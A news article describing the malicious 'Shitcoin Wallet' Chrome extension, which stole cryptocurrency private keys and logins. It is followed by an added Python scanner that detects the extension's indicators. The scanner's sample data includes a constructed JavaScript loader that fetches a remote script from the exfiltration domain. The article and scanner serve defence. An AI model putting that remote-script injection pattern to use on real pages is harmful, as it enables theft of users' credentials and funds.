Recently, a Google Chrome extension was caught injecting malicious JavaScript code into web pages. This code allows the extension to steal passwords and private keys from the user's Bitcoin wallets and cryptocurrency portals.
Badly Named with Bad Intents
The extension is rather tastelessly named Shitcoin Wallet and carries the extension ID ckkgmccefffnbbalkmbbgebbojjogffn. It launched on 9 December 2019.
In the introductory blog post for the extension, the group behind it describes Shitcoin Wallet as a wallet that lets users buy Ethereum coins and manage them properly. It also supports ERC20-based tokens, the kind usually distributed through Initial Coin Offerings (ICOs).
Very Convenient, But Tarnished
Had it been benign, this Chrome extension would have served a useful purpose. Users could install it and manage both ETH and ERC-20 tokens within their own web browser. Users could also install a desktop app for Windows if they wished to manage their funds outside the higher-risk environment of a browser.
Things started to fall apart afterward, with Harry Denley setting the collapse in motion. Denley, Director of Security at the MyCrypto platform, discovered that the extension contained malicious code. It seems nothing can just be for the good of all humanity.
Denley explained that the extension was dangerous in two significant ways. The first was that any funds managed directly within the extension were at risk, because the extension sends the private keys of any and all wallets managed or created within its interface to a third-party website at the address erc20wallet[.]tk.
The second key issue is its active injection of JavaScript code whenever a user navigates to one of five popular and well-known cryptocurrency management platforms. With the malicious code injected, the extension steals the private keys and login details for those platforms as well, sending them to the same third-party website.
Step By Step
A detailed analysis of the code shows the process step by step. First, the user installs the extension, which requests permission to inject additional JavaScript code on 77 websites. When one of these 77 websites is accessed, the extension loads and injects another JavaScript file from https://erc20wallet[.]tk/js/content_.js. This file contains obfuscated code that activates on five other websites: MyEtherWallet.com, Idex.Market, Binance.org, NeoTracker.io, and Switcheo.exchange. This code, in turn, logs the private keys and login information a user enters and sends them to the third-party website.
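The behaviour described above leaves three indicators a defender can check for on a workstation: the extension ID, the exfiltration domain, and content scripts declared against an unusually broad set of hosts. The following Python script is an added example written for this article, not code from the article, from MyCrypto or from the extension's analysis; it assumes the standard Chrome profile layout of `Extensions/<id>/<version>/manifest.json`, and the `BROAD_INJECTION_THRESHOLD` value and the sample manifests are constructed for illustration.

```python
"""Scan Chrome extension directories for the Shitcoin Wallet indicators.

Added example: the extension ID and exfiltration domain come from the
article; the directory layout, threshold and sample data are assumptions.
"""
import json
import re
from pathlib import Path
from typing import Dict, List, Set

# Indicators from the article. The domain is stored defanged and normalised
# before matching so the list can be pasted straight from a report.
KNOWN_BAD_EXTENSION_IDS = {"ckkgmccefffnbbalkmbbgebbojjogffn"}
KNOWN_BAD_DOMAINS = {d.replace("[.]", ".") for d in ("erc20wallet[.]tk",)}

# Assumption for this example: a wallet extension has no reason to inject
# content scripts into dozens of unrelated sites.
BROAD_INJECTION_THRESHOLD = 20

# Hostname following an http(s) scheme inside a script's source text.
DOMAIN_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)


def content_script_hosts(manifest: dict) -> List[str]:
    """Return every match pattern declared under content_scripts."""
    hosts: List[str] = []
    for entry in manifest.get("content_scripts", []):
        hosts.extend(entry.get("matches", []))
    return hosts


def remote_domains_in_script(source: str) -> Set[str]:
    """Collect hostnames referenced by URL inside a script."""
    return {m.lower() for m in DOMAIN_RE.findall(source)}


def assess_extension(ext_id: str, manifest: dict, scripts: Dict[str, str]) -> List[str]:
    """Return human-readable findings; an empty list means nothing matched."""
    findings: List[str] = []
    if ext_id in KNOWN_BAD_EXTENSION_IDS:
        findings.append(f"known-bad extension id {ext_id}")
    hosts = content_script_hosts(manifest)
    if "<all_urls>" in hosts or len(hosts) >= BROAD_INJECTION_THRESHOLD:
        findings.append(f"content scripts declared for {len(hosts)} host patterns")
    for name, source in scripts.items():
        for domain in sorted(remote_domains_in_script(source) & KNOWN_BAD_DOMAINS):
            findings.append(f"{name} references exfiltration domain {domain}")
    return findings


def scan_extension_root(ext_root: Path) -> Dict[str, List[str]]:
    """Walk <profile>/Extensions/<id>/<version>/ and return id -> findings."""
    results: Dict[str, List[str]] = {}
    for id_dir in ext_root.iterdir():
        if not id_dir.is_dir():
            continue
        for version_dir in id_dir.iterdir():
            manifest_path = version_dir / "manifest.json"
            if not manifest_path.is_file():
                continue
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
            scripts = {p.name: p.read_text(encoding="utf-8", errors="ignore")
                       for p in version_dir.rglob("*.js")}
            findings = assess_extension(id_dir.name, manifest, scripts)
            if findings:
                results[id_dir.name] = findings
    return results


# Constructed sample data mirroring the article's description: 77 host
# patterns and a loader that pulls the remote script from the bad domain.
SAMPLE_MALICIOUS_MANIFEST = {
    "name": "Shitcoin Wallet",
    "version": "1.0",
    "content_scripts": [{"matches": [f"*://site{i}.example/*" for i in range(77)],
                         "js": ["content.js"]}],
}
SAMPLE_MALICIOUS_SCRIPT = (
    "var s=document.createElement('script');"
    "s.src='https://erc20wallet.tk/js/content_.js';"
    "document.head.appendChild(s);"
)
SAMPLE_BENIGN_MANIFEST = {
    "name": "Note Taker",
    "version": "2.1",
    "content_scripts": [{"matches": ["*://notes.example/*"], "js": ["notes.js"]}],
}
SAMPLE_BENIGN_SCRIPT = "console.log('notes loaded');"


if __name__ == "__main__":
    bad = assess_extension("ckkgmccefffnbbalkmbbgebbojjogffn",
                           SAMPLE_MALICIOUS_MANIFEST,
                           {"content.js": SAMPLE_MALICIOUS_SCRIPT})
    good = assess_extension("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                            SAMPLE_BENIGN_MANIFEST,
                            {"notes.js": SAMPLE_BENIGN_SCRIPT})
    print("malicious sample:", bad)
    print("benign sample:", good)
```

On a live system, point `scan_extension_root` at the profile's `Extensions` directory; the broad-injection check is the most durable of the three, since a repackaged variant can change its ID and domain but still needs wide content-script coverage to reach the targeted wallet sites.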